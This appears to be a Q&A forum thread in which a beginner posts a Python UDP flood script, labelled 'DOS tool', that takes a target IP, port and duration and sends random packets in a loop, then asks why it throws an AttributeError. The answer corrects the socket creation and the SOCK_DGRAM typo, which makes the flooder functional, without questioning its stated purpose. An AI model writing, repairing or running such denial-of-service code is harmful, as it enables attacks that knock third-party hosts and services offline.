# "sock.sendto(bytes, (ip, port))""AttributeError: 'str' object has no attribute 'sendto' "

Tags: python, attributeerror

I am new to python (I am using Python 3.7.2) and I ran into this problem:

sock.sendto(bytes, (ip, port))
AttributeError: 'str' object has no attribute 'sendto'

Here is the whole code:

```
import os
import sys
import time
import socket
import random

sock = "socket.socket(socket.AF_INET, socket.SOCK.DGRAM)"

bytes = random._urandom(1024)

os.system("clear") 

print("DOS tool here")
print("")
ip = input("Target IP: ")
port = input("Enter port: ")
dur = input("Time: ")
timeout = time.time() + int(dur)
sent = 0 

while True:
        try:
                if time.time() > timeout:
                          break
                else:
                        pass 
                sock.sendto(bytes, (ip, port))
                sent = sent + 1 
                print ("Sent %s packets to %s trough port %s")%(sent, ip, port)
        except KeyboardInterrupt:
                sys.exit()
```

Answer (score 0):

Note in your code how you have

```py
sock = "socket.socket(socket.AF_INET, socket.SOCK.DGRAM)"
```

You've created a string rather than a socket! If you remove the quotes around it

```py
sock = socket.socket(socket.AF_INET, socket.SOCK.DGRAM)
```

You end up creating a socket object.

But we're not quite there yet, because there's one more typo: `socket` doesn't have a `SOCK` constant, instead we want to use `socket.SOCK_DGRAM` (note the underscore rather than the dot) as our type, like so:

```py
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
```

You'll have a socket with the appropriate `sendto` method that you're expecting!

Comment: Thank you, lol I didn't notice I had quotes. i removed them, but now it says AttributeError: 'module' object has no attribute 'SOCK'  instead. Know how to fix it? Sorry im a newbie hehehe

Comment: Ah, yes, I missed another typo in my answer! I've updated it to reflect the change to `SOCK_DGRAM`